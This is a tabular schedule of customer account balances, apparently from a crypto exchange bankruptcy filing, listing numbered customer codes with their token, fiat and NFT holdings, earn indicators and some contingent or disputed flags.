| 07362963 | | BF_POINT[300], MATIC[0], NFT (503005802249643861/The Hill by FTX #4489)[1], SHIB[108], SOL[0], USD[25000.00], USDT[0.00028907] | | |
| 07362964 | | USD[10.00] | | |
| 07362965 | | BAT[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07362966 | | ETH[0.00000001], NFT (360510097377315178/Cyber Abstraction #5)[1], NFT (370446090053297163/Dragons #2)[1], NFT (510190598041987152/Cyber Abstraction #2)[1], SOL[0], USD[0.00], USDT[0.00800000] | | |
| 07362967 | | CUSDT[3], TRX[2], USD[0.01] | Yes | |
| 07362968 | | USD[10.00] | | |
| 07362969 | | BTC[.00081909], CUSDT[2], DOGE[810.42724978], USD[0.00] | | |
| 07362971 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07362972 | | BRZ[2], CUSDT[9], DOGE[12.88361947], NFT (292978801288107526/Mech #6807)[1], NFT (47106333964265068/Mech #2704)[1], NFT (50660001952483974/Gloom Punk #2628)[1], SHIB[4], SOL[.00000001], SUSHI[.00009475], TRX[1], USD[0.00], YFI[.00030412] | Yes | |
| 07362973 | | USD[10.00] | | |
| 07362974 | | USD[10.00] | | |
| 07362975 | | CUSDT[1], DOGE[463.1461487], USD[0.00] | | |
| 07362976 | | DOGE[1], SHIB[1], USD[0.00] | Yes | |
| 07362977 | | USD[10.00] | | |
| 07362978 | | CUSDT[4], USD[0.00] | | |
| 07362979 | | USD[10.00] | | |
| 07362980 | | USD[10.00] | | |
| 07362981 | | USD[10.00] | | |
| 07362982 | | USD[10.00] | | |
| 07362983 | | DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07362988 | | USD[10.77] | Yes | |
| 07362990 | | CUSDT[2], DOGE[1], TRX[2], USD[0.41], USDT[0] | | |
| 07362991 | | USD[0.00] | | |
| 07362992 | | CUSDT[5], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07362993 | | USD[10.00] | | |
| 07362994 | | AVAX[3.22783829], BAT[2.11741726], BRZ[9.82012286], BTC[.00987426], CUSDT[22], DOGE[2011.54424379], ETH[2.50833614], ETHW[20.39670625], GRT[2.04286438], LTC[6.71772374], SHIB[13], SOL[18.97743313], SUSHI[1.10211629], TRX[2.13166909], UNI[1.10246873], USD[0.24], USDT[2.20493747] | Yes | |
| 07362995 | | USD[10.00] | | |
| 07362996 | | DOGE[3.000548], USD[0.00] | Yes | |
| 07362997 | | BTC[.01270091], CUSDT[4], DOGE[1], ETH[.08399213], ETHW[.08399213], GRT[45.55151093], LINK[18.72415933], SUSHI[1.04524409], TRX[2], USD[3.81] | | |
| 07362998 | | LTC[.01119128], USD[8.00] | | |
| 07363000 | | DOGE[1], USD[0.00] | | |
| 07363003 | | CUSDT[1], USD[0.01] | | |
| 07363004 | | USD[0.00] | | |
| 07363005 | | AAVE[.00000341], BAT[11.07713004], BRZ[24.00344343], BTC[.00001628], ETH[.00073868], ETHW[.00073391], GRT[1.00367791], LTC[.00001124], MATIC[.00117649], MKR[.00012058], NFT (388698105825460849/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #25)[1], NFT (463515547401131149/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #26)[1], NFT (476304244888958441/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #24)[1], NFT (505532081666072289/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #11)[1], SHIB[9], SOL[1.28610023], SUSHI[.1290962], TRX[15.44126749], UNI[.05182216], USD[0.00], USDT[0], YFI[.00001283] | Yes | |
| 07363006 | | CUSDT[1], GRT[4.20783689], USD[0.00] | | |
| 07363007 | | BTC[0.00000001], CUSDT[0], DOGE[0.01177339], SHIB[1], SOL[0], USD[0.00] | Yes | |
| 07363009 | | USD[0.00] | | |
| 07363010 | | USD[10.00] | | |
| 07363011 | | TRX[1], USD[0.00] | Yes | |
| 07363012 | | CUSDT[2], ETH[0.00535242], ETHW[0.00535242], GRT[1.00321063], NFT (306730258379477593/What Time Is It #10 Of 20)[1], NFT (327703696669308078/What Time Is It #11 Of 20)[1], NFT (343627342300788288/Brick World #16)[1], NFT (391957914588069728/What Time Is It #5 Of 20)[1], NFT (402892303127157897/Curry vs Canelo)[1], NFT (428937330709385621/Wyatt)[1], NFT (434080162374047470/What Time Is It #3 Of 20 #2)[1], NFT (439221498439900057/What Time Is It #8 Of 20 #2)[1], NFT (442710797468653880/What Time Is It #4 Of 20)[1], NFT (525619592424662288/What Time Is It #6 Of 20)[1], NFT (539527168597448525/Cardano in Quarantine)[1], NFT (539820836246338/What Time Is It #1 Of 20 #2)[1], NFT (542984432971535270/Halloween Crossover #1)[1], SHIB[2], TRX[2], USD[0.00], USDT[0.00011190] | | |
| 07363014 | | USD[10.00] | | |
| 07363016 | | BAT[0], BTC[0], DOGE[81.64163527], ETH[0], GRT[0], LINK[0], LTC[0], NFT (448067896712757467/Solarian Laser Eyes)[1], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[2.01819182] | Yes | |
| 07363017 | | BTC[.00033158], CUSDT[1], DOGE[1], ETH[.00000106], ETHW[.11643725], SHIB[2], SOL[1.23723855], TRX[1], USD[59.08] | Yes | |
| 07363018 | | USD[10.00] | | |
| 07363019 | | USD[10.00] | | |
| 07363021 | | USD[11.06] | Yes | |
| 07363023 | | BCH[0], BTC[0], DOGE[0], GRT[0], LTC[0], PAXG[0], SOL[0], USD[0.00], USDT[0.00000663] | Yes | |
| 07363024 | | USD[10.00] | | |
| 07363025 | | DOGE[1], LTC[.06225229], USD[0.01] | Yes | |
| 07363026 | | BRZ[1], CUSDT[4], DOGE[1], TRX[1], USD[120.49] | | |
| 07363028 | | CUSDT[2], SHIB[1], USD[4.72] | Yes | |
| 07363029 | | USD[10.00] | | |
| 07363030 | | BTC[2], CUSDT[3], DOGE[5.13981817], GRT[0], SOL[4.10153363], SUSHI[0], TRX[2], USD[0.00], YFI[0] | Yes | |
| 07363031 | | USD[10.00] | | |
| 07363032 | | USD[10.00] | | |
| 07363034 | | CUSDT[1], DOGE[4.05213569], TRX[1447.17444411], USD[0.00] | Yes | |
| 07363036 | | USD[99.58] | | |
| 07363037 | | CUSDT[1], ETH[0.00000015], ETHW[0.0000015], MKR[.00373735], USD[0.00] | Yes | |
| 07363039 | | BTC[.00017539], USD[0.00] | | |
| 07363041 | | BTC[0], DOGE[0], ETH[0], SOL[0], TRX[0], USD[0.00] | | |
| 07363042 | | USD[10.00] | | |
| 07363043 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07363044 | | TRX[59.87830333], USD[0.00] | | |
| 07363045 | | USD[10.00] | | |
| 07363046 | | TRX[205.85077301], USD[0.00] | | |
| 07363048 | | CUSDT[2], DOGE[373.24397509], TRX[2], USD[0.12] | | |
| 07363049 | | BTC[0], SHIB[1], USD[11.68] | | |
| 07363050 | | BTC[0], DOGE[11.35915196], ETH[0.00068000], ETHW[0.00068000], SOL[0.12874474], USD[0.00] | | |
| 07363051 | | DOGE[.428], ETH[.00081797], ETHW[0.00081796], SOL[.0080491], USD[0.01] | | |
| 07363053 | | USD[10.00] | | |
| 07363054 | | USD[10.00] | | |
| 07363055 | | DOGE[0], USD[0.00] | | |
| 07363056 | | BRZ[1], DOGE[0], ETH[0], ETHW[0], USD[1.42] | | |
| 07363057 | | USD[10.00] | | |
| 07363058 | | USD[10.00] | | |
| 07363059 | | USD[10.00] | | |
| 07363062 | | SHIB[22055930.69060945], TRX[.00000001], USD[0.00] | Yes | |
| 07363063 | | DOGE[1], UNI[.000024], USD[0.00] | Yes | |
| 07363064 | | USD[10.00] | | |
| 07363066 | | USD[10.00] | | |
| 07363067 | | CUSDT[4], DOGE[1], NFT (48790933729784160Coachella x FTX Weekend 2 #24956)[1], SOL[0.75438780], USD[0.00] | Yes | |
| 07363071 | | BRZ[0], CUSDT[0], DOGE[0], ETH[0], ETHW[0], GRT[0], MATIC[0], MKR[0], PAXG[0], SOL[0], TRX[11782.66196762], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07363072 | Contingent, Disputed | BAT[0], BRZ[4], BTC[0], CUSDT[42], DOGE[3], EUR[0.00], NFT (44830711016294929Bahrain Ticket Stub #515)[1], SHIB[1], TRX[4], USD[0.22], USDT[0] | Yes | |
| 07363073 | | USD[0.00] | | |
| 07363074 | | USD[10.00] | | |
| 07363077 | | USD[10.00] | | |
| 07363078 | | USD[10.00] | | |
| 07363079 | | USD[10.00] | | |
| 07363080 | | USD[10.00] | | |
| 07363081 | | USD[10.00] | | |
| 07363083 | | DOGE[176.93963082], USD[0.00] | Yes | |
| 07363085 | | USD[10.00] | | |
| 07363087 | | USD[10.00] | | |
| 07363088 | | BAT[4.71630458], CUSDT[52.25681298], DOGE[.74527561], GRT[1.0099885], TRX[122.71913592], USD[-3.99] | Yes | |
| 07363089 | | CUSDT[2], DOGE[7634.3750557], TRX[1], USD[130.00] | | |
| 07363090 | | USD[10.00] | | |
| 07363091 | | SOL[0], TRX[0], USD[0.00] | | |
| 07363092 | | BTC[.00212148], DOGE[1.17508309], GRT[1], TRX[7.93184182], USD[0.40] | | |
| 07363093 | | USD[0.01] | | |
| 07363094 | | BAT[12.39306554], CUSDT[112.18716474], DOGE[619.79596218], ETH[.00277168], ETHW[.00273293], LINK[1.3861047], TRX[13.58355926], USD[0.00] | Yes | |
| 07363095 | | DOGE[2], SUSHI[0.62591152], TRX[1], USD[0.00] | | |
| 07363096 | | USD[10.00] | | |
| 07363097 | | DOGE[.9715], USD[0.00] | | |
| 07363098 | | BTC[0], GRT[4.33990147], USD[0.00] | | |
| 07363099 | | DOGE[4.0504046], USD[0.00] | | |
| 07363100 | | USD[10.00] | | |
| 07363101 | | USD[1.57] | | |
| 07363103 | | BCH[0.00000039], BRZ[0.00011942], BTC[0.00003532], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], PAXG[0], SGD[0.00], SOL[0], SUSHI[0], TRX[0], USD[0.38], USDT[0.00003312], YFI[0] | Yes | |
| 07363104 | | DOGE[.00881244], LINK[0], USD[0.00] | | |
| 07363105 | | USD[10.00] | | |
| 07363106 | | USD[10.00] | | |
| 07363107 | | BTC[.00004038], DOGE[113.57077193], LTC[.03631742], USD[0.00], USDT[0.97054648] | Yes | |
| 07363108 | | DOGE[4.28227003], USD[0.11] | | |
| 07363109 | | CUSDT[1], DOGE[140.28545353], TRX[1], USD[0.01] | Yes | |
| 07363110 | | USD[10.00] | | |
| 07363111 | | LTC[0], MATIC[1016.17086862], SOL[0], TRX[0], USD[0.15] | | |
| 07363112 | | USD[10.00] | | |
| 07363115 | | BTC[.00021273], USD[0.00] | | |
| 07363116 | | GRT[4.34424137], USD[0.00] | | |
| 07363121 | | BAT[0], DOGE[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07363122 | | USD[10.00] | | |
| 07363124 | | USD[10.00] | | |
| 07363125 | | USD[0.00] | | |
| 07363126 | | BCH[.01491206], BTC[.00094569], DOGE[2], GRT[12.60447312], LTC[.11091274], SOL[.35879193], TRX[204.80564149], USD[0.00] | | |
| 07363127 | | BRZ[3], CUSDT[5], DOGE[1], SHIB[1], TRX[1], USD[0.01] | | |
| 07363128 | | USD[10.02] | | |
| 07363129 | | BTC[0], MATIC[0], SOL[0], USD[11.96] | | |
| 07363131 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07363133 | | TRX[415.584], USD[0.08] | | |
| 07363134 | | CUSDT[3], DOGE[0], TRX[287.11451029], USD[0.00] | Yes | |
| 07363135 | | USD[10.00] | | |
| 07363137 | | USD[10.00] | | |
| 07363138 | | USD[10.00] | | |
| 07363139 | | CUSDT[1], DOGE[.0012388], ETH[0], USD[0.00] | | |
| 07363140 | | USD[10.00] | | |
| 07363141 | | CUSDT[560.86060387], ETH[0], USD[0.00] | Yes | |
| 07363143 | | CUSDT[2], USD[0.01] | | |
| 07363144 | | SUSHI[.999], TRX[1726.66327222], USD[0.04] | | |
| 07363145 | | USD[10.00] | | |
| 07363146 | | USD[10.00] | | |
| 07363147 | | USD[10.00] | | |
| 07363148 | | SOL[.0044], USD[0.01] | | |
| 07363150 | | USD[10.00] | | |
| 07363151 | | USD[10.76] | Yes | |
| 07363152 | | USD[10.00] | | |
| 07363154 | | USD[10.00] | | |
| 07363155 | | BRZ[3], BTC[0.00176641], CUSDT[20], DOGE[350.18358887], ETH[0.04933440], ETHW[0.04933440], GRT[1], KSHIB[961.51072565], LTC[0.39630675], MATIC[28.8531792], MKR[.0166107], SHIB[957487.55266181], SUSHI[8.45692645], TRX[11], UNI[0], USD[0.00], USDT[1] | | |
| 07363156 | | USD[10.00] | | |
| 07363157 | | BTC[.00010711], TRX[109.31508849], USD[0.00] | | |
| 07363159 | | CUSDT[1], DOGE[.00000133], ETH[0], USD[0.00] | | |
| 07363161 | | GRT[5.01272163], USD[0.00] | | |
| 07363162 | | USD[10.00] | | |
| 07363163 | | USD[10.00] | | |
| 07363165 | | USD[10.00] | | |
| 07363166 | | DOGE[125.61862461], TRX[1], USD[0.00] | | |
| 07363167 | | DOGE[5461.05796034], USD[10.78] | Yes | |
| 07363168 | | BTC[0], USD[0.02] | | |
| 07363169 | | USD[10.00] | | |
| 07363170 | | USD[10.00] | | |
| 07363171 | | BCH[.0190885], CUSDT[1], USD[0.00] | | |
| 07363172 | | USD[10.00] | | |
| 07363173 | | CUSDT[1], DOGE[1.80106757], USD[0.01] | | |
| 07363175 | | USD[0.00] | | |
| 07363176 | | USD[10.00] | | |
| 07363177 | | BTC[.00015826], DOGE[365.43345344], TRX[1], USD[0.94] | | |
| 07363179 | | BTC[0], DOGE[2], USD[0.00], USDT[0] | | |
| 07363180 | | USD[10.00] | | |
| 07363181 | | USD[10.00] | | |
| 07363182 | | USD[10.00] | | |
| 07363183 | | USD[10.00] | | |
| 07363184 | | CUSDT[2], DOGE[0], GRT[13.91417044], USD[0.00] | | |
| 07363185 | | USD[10.00] | | |
| 07363186 | | USD[10.00] | | |
| 07363188 | | BRZ[13.2140493], CUSDT[35], DOGE[2], GRT[63.97944613], SUSHI[.77869699], TRX[1], USD[-0.35], USDT[1.10117075] | Yes | |
| 07363189 | | USD[10.00] | | |
| 07363190 | | BRZ[0], BTC[.0445463], DOGE[17554.02755687], ETH[1.09600511], ETHW[1.09554466], LTC[3.47864064], MATIC[297.45231711], SHIB[12779137.08966253], SOL[17.16679972], USD[0.00] | Yes | |
| 07363191 | | CUSDT[2], TRX[0], USD[0.00] | Yes | |
| 07363192 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07363193 | | USD[0.00], USDT[0] | | |
| 07363194 | | BAT[1], BTC[0], CUSDT[8], DOGE[0], ETH[0], TRX[0], USD[0.00] | | |
| 07363195 | | DOGE[6262.14078522], USD[0.00] | | |
| 07363196 | | USD[10.00] | | |
| 07363197 | | BTC[.00020109], USD[0.00] | | |
| 07363198 | | SOL[2.34771995], USD[0.00] | | |
| 07363199 | | USD[10.00] | | |
| 07363200 | | BTC[0], SOL[0], USD[0.83] | | |
| 07363201 | | USD[10.00] | | |
| 07363203 | | BTC[0], DAI[0], ETH[0], ETHW[6.44400000], USD[0.00], USDT[0] | | |
| 07363204 | | USD[10.00] | | |
| 07363205 | | BTC[.00199082], CUSDT[5], ETH[.3083178], ETHW[.30812646], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07363206 | | USD[10.00] | | |
| 07363207 | Contingent, Disputed | BAT[0], BTC[0], DOGE[0], TRX[0], USD[0.00] | | |
| 07363208 | | USD[10.00] | | |
| 07363210 | | BRZ[2], CUSDT[18], DOGE[3448.74521658], SHIB[31.52799307], TRX[5543.2639767], USD[0.15] | Yes | |
| 07363211 | | BAT[1], BRZ[6], CUSDT[13], DOGE[3], GRT[1], TRX[6], USD[0.00], USDT[1] | | |
| 07363212 | | USD[10.00] | | |
| 07363213 | | ETH[.00487766], ETHW[.00487766], USD[0.00] | | |
| 07363214 | | CUSDT[4], USD[0.00] | Yes | |
| 07363215 | | USD[10.00] | | |
| 07363216 | | DOGE[169.22930604], USD[0.00] | | |
| 07363217 | | USD[10.00] | | |
| 07363218 | | DOGE[.00586638], USD[0.00] | | |
| 07363219 | | USD[4500.00] | | |
| 07363221 | | USD[0.12], USDT[0] | | |
| 07363223 | | BTC[.00026931], CUSDT[2], DOGE[909.42407345], ETH[.01232737], ETHW[.01232737], LTC[.08825909], SUSHI[1.15547216], USD[10.00] | | |
| 07363224 | | CUSDT[2], DOGE[1525.77719735], TRX[651.07585945], USD[0.00] | | |
| 07363225 | | BTC[0], ETH[.00000001], ETHW[0], TRX[0], USD[82.29], USDT[0] | | |
| 07363226 | | USD[11.00] | Yes | |
| 07363227 | | USD[10.38] | Yes | |
| 07363229 | | BTC[0], DOGE[1], ETH[0], LINK[0], SHIB[33.05302714], SOL[0], SUSHI[0], UNI[0], USD[0.00] | Yes | |
| 07363231 | | DOGE[55.33371611], TRX[1], USD[0.00] | | |
| 07363232 | | BRZ[2], DOGE[.00002501], GRT[1], TRX[1], USD[1387.65] | | |
| 07363234 | | USD[10.00] | | |
| 07363237 | | USD[0.00] | | |
| 07363238 | | BAT[0], DOGE[0], GRT[0], LINK[0], MATIC[0], SOL[0], TRX[0], USD[0.01], USDT[0.00000001] | Yes | |
| 07363239 | | BTC[0], ETH[0], GRT[0], LINK[0], LTC[0], USD[0.00], USDT[0.00000002] | | |
| 07363242 | | ETH[0], PAXG[0], USD[50.20] | | |
| 07363243 | | USD[10.00] | | |
| 07363244 | | USD[10.00] | | |
| 07363245 | | BAT[1], BRZ[8.2088156], BTC[.00000077], CUSDT[13], DOGE[5], ETH[.00000511], ETHW[1.71175750], MATIC[.00101505], SHIB[11], TRX[9], USD[54.03], USDT[0] | Yes | |
| 07363247 | | USD[10.00] | | |
| 07363250 | | DOGE[0], LINK[0], SOL[0], USD[0.00] | | |
| 07363251 | | ETH[0], USD[0.01] | | |
| 07363253 | | USD[0.00] | | |
| 07363254 | Contingent, Disputed | LINK[.00000001], USD[0.00] | | |
| 07363255 | | ETH[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07363256 | | CUSDT[2], USD[0.00] | | |
| 07363257 | | DOGE[20.42088464], USD[0.00] | | |
| 07363260 | | USD[10.00] | | |
| 07363261 | | LTC[0], SOL[0] | | |
| 07363262 | | DOGE[.611], TRX[.9194], USD[0.00], USDT[0] | | |
| 07363264 | | USD[10.00] | | |
| 07363269 | | USD[10.00] | | |
| 07363271 | | CUSDT[4], DOGE[34.8817329], TRX[1198.89635872], USD[-35.00], USDT[0.00000001] | Yes | |
| 07363272 | Contingent, Disputed | USD[0.00] | | |
| 07363273 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07363276 | | USD[10.00] | | |
| 07363278 | | USD[11.05] | Yes | |
| 07363279 | | USD[10.00] | | |
| 07363281 | | USD[10.00] | | |
| 07363282 | | USD[10.00] | | |
| 07363283 | | BRZ[1], CUSDT[2], DOGE[8], SUSHI[0], TRX[2], UNI[0], USD[10.00], USDT[0] | | |
| 07363284 | | BAT[1], BRZ[2], CUSDT[13], DOGE[100.00001498], TRX[8], USD[0.30] | | |
| 07363285 | | USD[0.00] | | |
| 07363287 | | CUSDT[1], DOGE[19884.11463526], TRX[1], USD[0.00] | | |
| 07363288 | | USD[10.00] | | |
| 07363290 | | USD[0.00] | | |
| 07363291 | | CUSDT[1], SHIB[0], USD[0.00] | | |
| 07363292 | | USD[10.00] | | |
| 07363293 | | USD[10.00] | | |
| 07363296 | | BTC[.0000069], ETH[.00013359], ETHW[.00013359], SOL[.0374], SUSHI[.388], USD[0.01] | | |
| 07363298 | | DOGE[1], SOL[.05836584], USD[0.00] | | |
| 07363299 | | USD[0.00] | | |
| 07363301 | | BRZ[1], CUSDT[1], SHIB[6], TRX[2], USD[1220.90] | Yes | |
| 07363302 | | BAT[0], BTC[0.00017546], CAD[0.00], ETH[0.00158981], ETHW[0.00158981], GRT[0], TRX[0], USD[0.00] | | |
| 07363303 | | USD[10.00] | | |
| 07363304 | | BAT[1], BRZ[1], DOGE[.08462196], GRT[1], TRX[4], USD[0.53], USDT[1] | | |
| 07363305 | Contingent, Disputed | USD[10.00] | | |
| 07363307 | | BAT[8.03184189], BTC[.00074715], CUSDT[14], DOGE[868.37867246], ETH[.01329697], ETHW[.01313269], LINK[1.84992336], SOL[1.39965396], SUSHI[3.41181864], TRX[177.39112477], USD[0.00] | Yes | |
| 07363308 | | USD[10.00] | | |
| 07363309 | | USD[10.00] | | |
| 07363310 | | ETH[0], ETHW[.000544], TRX[.198], USD[1.47] | | |
| 07363311 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07363313 | | USD[10.00] | | |
| 07363314 | | UNI[.3801399], USD[0.00] | | |
| 07363315 | | CUSDT[1], USD[0.00] | | |
| 07363316 | | USD[10.00] | | |
| 07363317 | | BAT[532.29511654], BRZ[1], CUSDT[1], DOGE[1], SOL[10.85333238], SUSHI[37.41727188], TRX[1886.29024365], UNI[50.64600272], USD[0.00] | | |
| 07363319 | | USD[10.00] | | |
| 07363321 | | USD[0.00] | Yes | |
| 07363322 | | MATIC[.00021937], USD[0.00], USDT[0] | | |
| 07363324 | | BAT[1], BRZ[3], CUSDT[2], DOGE[5555.27008292], SHIB[20526475.82993841], TRX[3], USD[0.00] | | |
| 07363326 | | USD[10.85] | Yes | |
| 07363328 | | BAT[5.77750909], BCH[.04669473], BTC[.00047551], CUSDT[1], DOGE[86.80672093], SOL[8.95912001], SUSHI[.52272352], USD[0.00] | Yes | |
| 07363329 | | USD[10.00] | | |
| 07363330 | | BTC[0], DOGE[0], ETH[0.00000001], ETHW[0], LTC[0], SOL[0], USD[0.00] | | |
| 07363331 | | USD[10.00] | | |
| 07363332 | | USD[10.00] | | |
| 07363333 | | BF_POINT[300], CUSDT[4], DOGE[6.1283646], ETH[0], LINK[1.08239655], SOL[0], TRX[0], USD[0.41], USDT[0] | Yes | |
| 07363334 | | USD[0.00] | | |
| 07363335 | | DOGE[4085.2782673], MATIC[98.51286628], SHIB[600005.48282082], SOL[1.16948723], USD[0.00], USDT[0] | | |
| 07363336 | | USD[10.00] | | |
| 07363338 | | DOGE[76.1321575], TRX[84.17464487], USD[0.00] | | |
| 07363339 | | USD[10.00] | | |
| 07363341 | | BTC[.00000001], DOGE[1998.16089582], USD[0.60], USDT[0] | | |
| 07363342 | | TRX[1], USD[0.00] | | |
| 07363343 | | USD[10.00] | | |
| 07363344 | | SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07363345 | | BAT[1], DOGE[7.00057537], ETH[.0040459], ETHW[.00399118], GRT[1.00326677], SHIB[2], SOL[0.00188583], TRX[2], UNI[2.09686624], USD[0.90], USDT[3.18192627] | Yes | |
| 07363346 | | DOGE[87.6656], SOL[101.81164], USD[2.17] | | |
| 07363347 | | MATIC[7.24505915], USD[0.00] | | |
| 07363349 | | USD[10.00] | | |
| 07363350 | | DOGE[206.32398157], USD[0.00] | Yes | |
| 07363351 | | BRZ[2], DOGE[4.03666], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07363352 | | USD[10.82] | Yes | |
| 07363353 | | USD[10.00] | | |
| 07363354 | | BRZ[2], CUSDT[4], DOGE[0], TRX[3], UNI[0], USD[0.00] | | |
| 07363356 | | DOGE[1], ETH[.00657944], ETHW[.00657944], USD[0.09] | | |
| 07363357 | | BRZ[1], DOGE[9.01621518], SHIB[9], SOL[4.51814958], TRX[4], USD[0.00], USDT[0.00000021] | Yes | |
| 07363358 | | USD[10.00] | | |
| 07363359 | | BF_POINT[200], ETH[0], NFT (395693061177406201/Australia Ticket Stub #1466)[1], NFT (441181335302098957/Entrance Voucher #2839)[1], USD[0.00] | Yes | |
| 07363360 | | USD[10.00] | | |
| 07363361 | | USD[0.01], USDT[0.00000001] | | |
| 07363363 | | TRX[1], USD[0.01] | | |
| 07363364 | | ETH[0.57629915], ETHW[.57629915], LINK[135.61702345], SOL[140.27191129], USD[0.30] | | |
| 07363367 | | CUSDT[2], DOGE[22.1754456], USD[0.09] | | |
| 07363368 | | USD[10.00] | | |
| 07363369 | | DOGE[147.60221674], USD[10.00] | | |
| 07363370 | | BRZ[1], ETH[.06431739], ETHW[.06431739], USD[10.00] | | |
| 07363371 | | BF_POINT[300], BRZ[1], BTC[0], DOGE[7.00057537], ETH[0.00000001], ETHW[0.00000019], GRT[1], NFT (366433453164602943/Bahrain Ticket Stub #1328)[1], NFT (412909059635332922/Humpty Dumpty #254)[1], NFT (421725881725382423/FTX - Off The Grid Miami #178)[1], NFT (549036343936259081/6/6 + 6 | 2+2)[1], SHIB[13], SOL[0], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07363372 | | USD[10.00] | | |
| 07363375 | | DOGE[165.56069363], USD[0.00] | | |
| 07363377 | | BTC[0], CUSDT[3], SOL[0], TRX[1], USD[0.00] | | |
| 07363381 | | USD[10.00] | | |
| 07363382 | | USD[0.03] | | |
| 07363383 | | USD[10.00] | | |
| 07363384 | | CUSDT[2], DOGE[1000.00003439], SUSHI[6.61331391], TRX[1], USD[0.01] | | |
| 07363386 | | USD[10.00] | | |
| 07363388 | | TRX[59.51796046], USD[0.00] | | |
| 07363390 | | CUSDT[42.40740534], DOGE[.00000013], USD[0.01], USDT[1] | | |
| 07363391 | | USD[10.00] | | |
| 07363394 | | BTC[0], CUSDT[3], DOGE[0.08663732], ETH[0.00051289], ETHW[0.00051289], USD[0.19] | Yes | |
| 07363396 | | USD[10.00] | | |
| 07363397 | | BAT[1], DOGE[.68314743], TRX[2], USD[0.00] | | |
| 07363398 | | USD[10.00] | | |
| 07363399 | | DOGE[34.91397754], USD[0.00] | | |
| 07363400 | | DOGE[1.00002869], GRT[1], TRX[1], USD[1.00] | | |
| 07363401 | | USD[0.00] | | |
| 07363402 | | BTC[0.00092726], CUSDT[2], GRT[1], USD[-0.04] | | |
| 07363403 | | USD[10.00] | | |
| 07363404 | | BRZ[0], USD[0.01] | | |
| 07363405 | | USD[10.00] | | |
| 07363407 | | USD[10.00] | | |
| 07363408 | | BRZ[1], CUSDT[2], DOGE[1], TRX[274.41301683], USD[0.36] | | |
| 07363409 | | DOGE[134.65973169], USD[0.00] | | |
| 07363410 | | ETH[.00644848], ETHW[.00644848], USD[10.00] | | |
| 07363411 | | DOGE[3], ETH[.00000001], ETHW[0], GRT[.00004557], USD[10.00] | | |
| 07363412 | | USD[10.00] | | |
| 07363414 | | USD[10.00] | | |
| 07363415 | | USD[10.00] | | |
| 07363416 | | USD[10.00] | | |
| 07363417 | | USD[10.00] | | |
| 07363418 | | BTC[.00001017], USD[0.05] | | |
| 07363421 | | BCH[0], CUSDT[1], DOGE[1], ETH[0], USD[0.00] | | |
| 07363423 | | BF_POINT[200], DOGE[521.44438537], LTC[0], NFT (479486494588037019/FTX - Off The Grid Miami #1024)[1], NFT (492661060472348730/Imola Ticket Stub #756)[1], NFT (536555586341108804/Entrance Voucher #16383)[1], SHIB[0], USD[0.00], USDT[0] | Yes | |
| 07363425 | | USD[10.00] | | |
| 07363426 | | USD[10.00] | | |
| 07363427 | | USD[11.03] | Yes | |
| 07363428 | | USD[10.00] | | |
| 07363429 | | DOGE[618.96289323], TRX[68.98370593], USD[0.00] | | |
| 07363430 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07363432 | | USD[10.00] | | |
| 07363433 | | DOGE[1500.75718931], ETH[.00559983], ETHW[.00559983], TRX[1], USD[0.00] | | |
| 07363434 | | BAT[17.59412947], CUSDT[1], DOGE[3], GRT[22.22959274], TRX[547.36409266], USD[0.00] | | |
| 07363436 | | USD[10.00] | | |
| 07363438 | | DOGE[299.28023104], USD[10.00] | | |
| 07363439 | | BRZ[1], CUSDT[6], KSHIB[27919.87871863], SHIB[28603895.40446233], TRX[1], USD[2.16], USDT[0] | Yes | |
| 07363441 | | USD[10.00] | | |
| 07363442 | | USD[10.00] | | |
| 07363443 | | USD[0.00] | | |
| 07363444 | | BCH[.02471472], BTC[.00030982], DOGE[131.47814216], ETH[.01767849], ETHW[.01745961], NFT (553588556622708645/APFUEL by Almond Breeze #196][1], UNI[1.37488858], USD[0.00] | Yes | |
| 07363445 | | CUSDT[1], DOGE[1], TRX[1], USD[0.71] | | |
| 07363446 | | CUSDT[1], DOGE[0.00816629], USD[0.00], USDT[1] | | |
| 07363448 | | CUSDT[1], ETH[.00000001], TRX[1], USD[0.01] | Yes | |
| 07363451 | | BTC[0.00226150], CUSDT[3], DOGE[6510.18615359], USD[10.00] | | |
| 07363452 | | BAT[1.01048375], BRZ[1], CUSDT[1], DOGE[1], TRX[3148.68952619], USD[0.00], USDT[1.0784007] | Yes | |
